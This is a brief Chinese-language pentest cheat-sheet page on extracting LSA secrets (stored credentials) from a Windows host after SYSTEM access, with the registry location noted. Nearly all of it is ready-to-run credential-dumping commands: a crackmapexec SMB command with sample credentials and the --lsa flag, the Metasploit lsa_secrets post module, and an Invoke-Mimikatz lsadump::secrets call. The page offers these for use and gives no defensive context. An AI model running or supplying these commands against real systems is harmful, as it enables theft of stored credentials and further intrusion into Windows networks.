权限:SYSTEM

描述:

对主机具有 SYSTEM 访问权限的攻击者可能会尝试访问 LSA 内容,这些内容中可能会包含各种不同的凭证。LSA 内容存储在 KEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

Crackmapexec

  1. crackmapexec smb '10.10.10.100' -u 'moe' -p 'Password123' --lsa

LSA - 图1

MSF

  1. use post/windows/gather/lsa_secrets

LSA - 图2

Mimikatz

  1. Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'

LSA - 图3

参考

LSA Secrets - Pentest Everything